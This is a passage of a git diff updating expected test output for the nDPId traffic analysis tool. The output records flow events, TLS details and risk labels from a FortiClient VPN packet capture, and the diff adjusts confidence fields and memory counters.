(cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} -01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01466{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
-00943{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
-00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
-00956{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01466{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
+00943{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
+00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 
+00956{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-payload-len":298759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1621067222261} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 
@@ -49,9 +49,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5962796 bytes -~~ total memory freed........: 5962796 bytes -~~ total allocations/frees...: 120158/120158 +~~ total memory allocated....: 6096430 bytes +~~ total memory freed........: 6096430 bytes +~~ total allocations/frees...: 122920/122920 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1471 chars diff --git a/test/results/ftp-start-tls.pcap.out b/test/results/ftp-start-tls.pcap.out index c395ef4ef..417f2c450 100644 --- a/test/results/ftp-start-tls.pcap.out +++ b/test/results/ftp-start-tls.pcap.out 
